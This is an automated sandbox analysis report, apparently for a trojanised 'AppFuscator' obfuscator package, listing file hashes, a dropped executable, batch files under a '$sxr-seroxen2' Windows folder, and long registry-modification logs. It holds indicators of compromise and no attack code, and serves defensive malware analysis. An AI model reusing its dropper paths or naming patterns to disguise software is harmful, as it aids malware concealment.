Overview
overview
7Static
static
3AppFuscato...or.exe
windows7-x64
7AppFuscato...or.exe
windows10-2004-x64
1AppFuscato...ib.dll
windows7-x64
1AppFuscato...ib.dll
windows10-2004-x64
1AppFuscato...db.dll
windows7-x64
1AppFuscato...db.dll
windows10-2004-x64
1AppFuscato...db.dll
windows7-x64
1AppFuscato...db.dll
windows10-2004-x64
1AppFuscato...ks.dll
windows7-x64
1AppFuscato...ks.dll
windows10-2004-x64
1AppFuscato...il.dll
windows7-x64
1AppFuscato...il.dll
windows10-2004-x64
1AppFuscato...on.dll
windows7-x64
1AppFuscato...on.dll
windows10-2004-x64
1AppFuscato...er.exe
windows7-x64
1AppFuscato...er.exe
windows10-2004-x64
1AppFuscato...er.exe
windows7-x64
1AppFuscato...er.exe
windows10-2004-x64
1AppFuscato...00.exe
windows7-x64
7AppFuscato...00.exe
windows10-2004-x64
7Analysis
-
max time kernel
84s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
26-06-2023 07:05
Static task
static1
Behavioral task
behavioral1
Sample
AppFuscator/AppFuscator.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
AppFuscator/AppFuscator.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral3
Sample
AppFuscator/ICSharpCode.SharpZipLib.dll
Resource
win7-20230621-en
Behavioral task
behavioral4
Sample
AppFuscator/ICSharpCode.SharpZipLib.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral5
Sample
AppFuscator/Mono.Cecil.Mdb.dll
Resource
win7-20230621-en
Behavioral task
behavioral6
Sample
AppFuscator/Mono.Cecil.Mdb.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral7
Sample
AppFuscator/Mono.Cecil.Pdb.dll
Resource
win7-20230621-en
Behavioral task
behavioral8
Sample
AppFuscator/Mono.Cecil.Pdb.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral9
Sample
AppFuscator/Mono.Cecil.Rocks.dll
Resource
win7-20230621-en
Behavioral task
behavioral10
Sample
AppFuscator/Mono.Cecil.Rocks.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral11
Sample
AppFuscator/Mono.Cecil.dll
Resource
win7-20230621-en
Behavioral task
behavioral12
Sample
AppFuscator/Mono.Cecil.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral13
Sample
AppFuscator/Newtonsoft.Json.dll
Resource
win7-20230621-en
Behavioral task
behavioral14
Sample
AppFuscator/Newtonsoft.Json.dll
Resource
win10v2004-20230621-en
Behavioral task
behavioral15
Sample
AppFuscator/StackTraceDecoder.exe
Resource
win7-20230621-en
Behavioral task
behavioral16
Sample
AppFuscator/StackTraceDecoder.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral17
Sample
AppFuscator/WatermarkDecoder.exe
Resource
win7-20230621-en
Behavioral task
behavioral18
Sample
AppFuscator/WatermarkDecoder.exe
Resource
win10v2004-20230621-en
Behavioral task
behavioral19
Sample
AppFuscator/unins000.exe
Resource
win7-20230621-en
Behavioral task
behavioral20
Sample
AppFuscator/unins000.exe
Resource
win10v2004-20230621-en
General
-
Target
AppFuscator/AppFuscator.exe
-
Size
348KB
-
MD5
c0063108031183c0a74c500306496b27
-
SHA1
a619151abdafb87616280e31ba549b166901efd5
-
SHA256
cdba3ef934bb92d0e93ab1c1dc78c119d8150fb28084c1bbc822455278d75027
-
SHA512
08769ecd2c721477ca1be4bfcd66a8d5c47f82d69b2516d88dd20cc81b62857134227cc8187f77992c640d0f70c3cdd8035026b213fb3a2ed7b42b641f30effb
-
SSDEEP
6144:pSjVjFfMLhY7lHZlMEpxi7iqm3tbfYhfMLhY7lkZlME:pSJxrqr
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 676 b767d428-cdd5-4028-b89f-6105e093c8ad.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 936 cmd.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe AppFuscator.exe File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe AppFuscator.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "90" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "90" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "901" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "394528104" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "12" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "41" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "901" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ddbc2eb40027547a7b75ae262b677ea000000000200000000001066000000010000200000008dc374e0d1bd68c10a431d89befb66b2937afb91926f55cb08991663da4a70a0000000000e800000000200002000000060f26e1c3db308649014c9da6cb50408ad5f3779c239b8f2fbf3cf7ce21e3c0f9000000029d18fa11bc03a758b733767f2be15ffdb7170eaea349b53f4f60b00cdde8e4214b8c5b9c82f2ea9a46b56e770028e0291a99edf5a31b56b17d40b1b0df02f716479e6db4fd1f2bc5fe0b9b712fa843833ce442e7317bd5eff77330e102fa0be4044595d6a963cd5e136775d23756d1c104aaf79b5a230d8a134674a39b705d46c1f791e605375dcd4658f42605fe1ff40000000005002c5f0f38ce47c1a520e33315df87a22b36b5b02ed8034ec020b5087e49485c0eb71056565b9c1bcd6984efc8861fb1673a1c4b1454f7daa177f9744505b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "62" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "119" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "151" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\NumberOfSubdomains = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "901" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002ddbc2eb40027547a7b75ae262b677ea00000000020000000000106600000001000020000000b55cd6bdcd8da87bcf202f2d92a2113c76dc14ac238cabf4d43d1e1126cae573000000000e8000000002000020000000b0d389e8bac3924d1fd5592484ed5390770bf6a5de7b9392427202a22554a8f22000000062fc3bdbc832ac94bee1c91d2180c9599755127ade09b42f41e2d6c245f4938240000000d9edfaf2cdfa29b173e088f6c4f5757c188f6973e6843d437da330f917acedaa8e3ff28cc4933c08c959bd4c0e37dad907bc4b7f69f18d90fe8b3cc167bb7329 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 903d19adfca7d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "41" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "105" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "119" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "12" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "41" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "105" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "915" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "151" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D55716B1-13EF-11EE-BFF5-C6B9AD923FE3} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "12" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "119" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "915" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\cabinet.appfuscator.com\ = "62" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000\Software\Microsoft\Internet Explorer\DOMStorage\appfuscator.com\Total = "90" IEXPLORE.EXE -
Modifies registry class 47 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC} AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "2" AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg AppFuscator.exe Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616193" AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff AppFuscator.exe Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" AppFuscator.exe Set value (str) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9} AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000078000000 AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" AppFuscator.exe Key created \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_Classes\Local Settings AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4" AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" AppFuscator.exe Set value (data) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 AppFuscator.exe Set value (int) \REGISTRY\USER\S-1-5-21-3465915139-4244146034-2076118314-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" AppFuscator.exe -
